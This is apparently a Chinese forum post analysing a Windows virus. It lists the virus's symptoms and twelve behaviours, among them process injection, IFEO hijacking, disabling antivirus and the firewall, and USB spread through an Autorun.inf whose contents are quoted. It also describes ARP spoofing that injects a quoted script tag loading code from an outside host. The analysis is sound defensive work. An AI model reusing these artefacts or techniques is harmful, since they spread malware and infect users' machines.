中毒症状：
一打入瑞星2字 IE就会自动关闭……
用baidu等搜索“杀毒”字样，所有网页会直接跳掉……
……

病毒行为：
==================================================
1、病毒是一个8位随机数组成的（0—F），其实是本身机子的机器码。运行后释放同名的Dll文件，设置系统全局挂勾。后枚举进程，插入TIMPlatform.exe和Explorer.exe进程（如果有）
Dll的文件在C:\Program Files\Common Files\MicrosoftShared\MSInfo\下，目录下还有个同名的dat文件```

2、插入进程的随机8位数.dll检测窗口句柄，并关闭列入病毒名单的“关键字”一些冷门的工具也不放过`````

3、修改IFEO重定向劫持，指向的是：C:\Program Files\Common Files\MicrosoftShared\MSInfo\的Dat文件。

4、破坏安全模式和显示隐藏文件，达到自身防护的目的。

5、释放一个Dl1.exe，创建远程线程并调用IE下载木马，下载其他病毒文件。

6、（遍历）每个分区，在跟目录下生成Autorun.inf和随机8位的EXE，达到双击硬盘激活病毒。
Autorun.inf内容为：
[AutoRun]
open=随机8位数.exe
shell\open=打开(&O)
shell\open\Command=随机8位数.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=随机8位数.exe

7、依附宿主的随机8位Dll每隔一段时间刷新，检测自身释放的“同党”和修改的注册表项，如果被修改和删除的话即使其恢复。并监视移动介质盘插入，支持U盘传播`````````

8、修改安全工具（杀软）服务和驱动的启动类型，设置为禁用，并删除其RUN启项，最后还挂了系统自带的防火墙``

9、用安全工具（如果能打开）检测宿主模块时，那么它则卸掉自身，安全工具退出（关闭）时，重新注入。

10、"病毒版本"：在C:\Program Files和C:\WINNT\system32\DirectX，释放一个.ini的文本，里面生成病毒的版本``我生成的是525，也就是5.25日更新的版本。

11、局域ARP挂马````比较“旁门”的技术（开始有点佩服作者）由外部下载的病毒ycnt9.exe，释放的win1ogo.exe，由它监听局域，每5秒刷新从自身机子（被感染的）经过的ARP数据包，并插入一短Js代码

代码内容为：
"<script language=javascript src=h**p://google.171738.org/ad2.js></script>"。嗅探范围：192.168.0.1-192.168.0.254，这意味着经过该被感染机子的数据包返回时，是一段被挂马的数据包！！！说简单点就是你浏览的所有网页上都有病毒。后来我点入该网址，是个MD5一样的8位随机病毒，呵呵，病毒名字为“hello.exe”。
这可比访问局域穷举猜口令轻松多了，这也是我佩服作者的地方。

12、常驻进程的随机8位数.dll每毫秒刷新，尝试拦截FindWindowExA、mouse_event等信息函数，修改映像命令，发送“假情报”`````向瑞星注册表监控捕捉发送“允许”命令`（不经过用户操作）``````